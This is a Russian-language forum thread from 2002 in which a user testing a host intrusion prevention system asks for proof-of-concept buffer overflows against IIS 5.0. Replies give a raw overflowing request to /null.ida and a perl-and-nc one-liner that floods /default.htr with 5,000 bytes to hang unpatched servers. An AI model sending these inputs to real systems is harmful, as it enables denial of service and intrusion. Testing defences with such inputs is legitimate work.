Пробовал, словила, падла.. На самом деле, просто telnet www.myiis.box 80 и потом:
GET /null.ida? [buffer=240bytes] = X HTTP/1.1
Host: www.worm.com
точно также переполняет буффер.
> попробуй так: > perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc > iis.my.net 80 > иис (непатченый) должен зависнуть.
Может кто подскажет, гда найти "proof of concept" реального buffer overflow для IIS? Тестирую Host Intrusion Prevention System, которая обещает защитить даже абсолютно "голый" IIS от переполнений баффера, даже в оригрнальной конфигурации с MDAC, scripts, ida/idq/htr ISAPI. Пока единственная программа, которая действительно переполняет буффер и чего-то делает - это Coldenair. Её мой HIPS словил и убил. Хочу попробовать другие.
Если кто знает - заранее благодарен.
З.Ы. Вещи типа Stealth, Satan, Retina и т. п. я уже пробовал - увы, они не проходят для тестирования, так как не пытаются провести само переполнение: быстрый тест и результат, который я знаю и без них - your system is vulnerable.
Взлом IIS через buffer overflow26.12.02 22:49 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
> Может кто подскажет, гда найти "proof of concept" реального > buffer overflow для IIS? Тестирую Host Intrusion Prevention > System, которая обещает защитить даже абсолютно "голый" IIS > от переполнений баффера, даже в оригрнальной конфигурации с > MDAC, scripts, ida/idq/htr ISAPI. Пока единственная > программа, которая действительно переполняет буффер и > чего-то делает - это Coldenair. Её мой HIPS словил и убил. > Хочу попробовать другие. > Если кто знает - заранее благодарен. >
Пробовал, словила, падла.. На самом деле, просто telnet www.myiis.box 80 и потом:
GET /null.ida? [buffer=240bytes] = X HTTP/1.1
Host: www.worm.com
точно также переполняет буффер.
> попробуй так: > perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc > iis.my.net 80 > иис (непатченый) должен зависнуть.
Взлом IIS через buffer overflow26.12.02 23:55 Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
Смотрел.. Проблема в том, что там в основном старье для взлома IIS 4.0, а я тестирую на 5.0.
Кстати, вот еще вопрос: есть информация о взломе Base64 encoding алгоритма, использующегося при Base Authentication в IIS? Поискал на Googlе, но ничего толкового не нашел.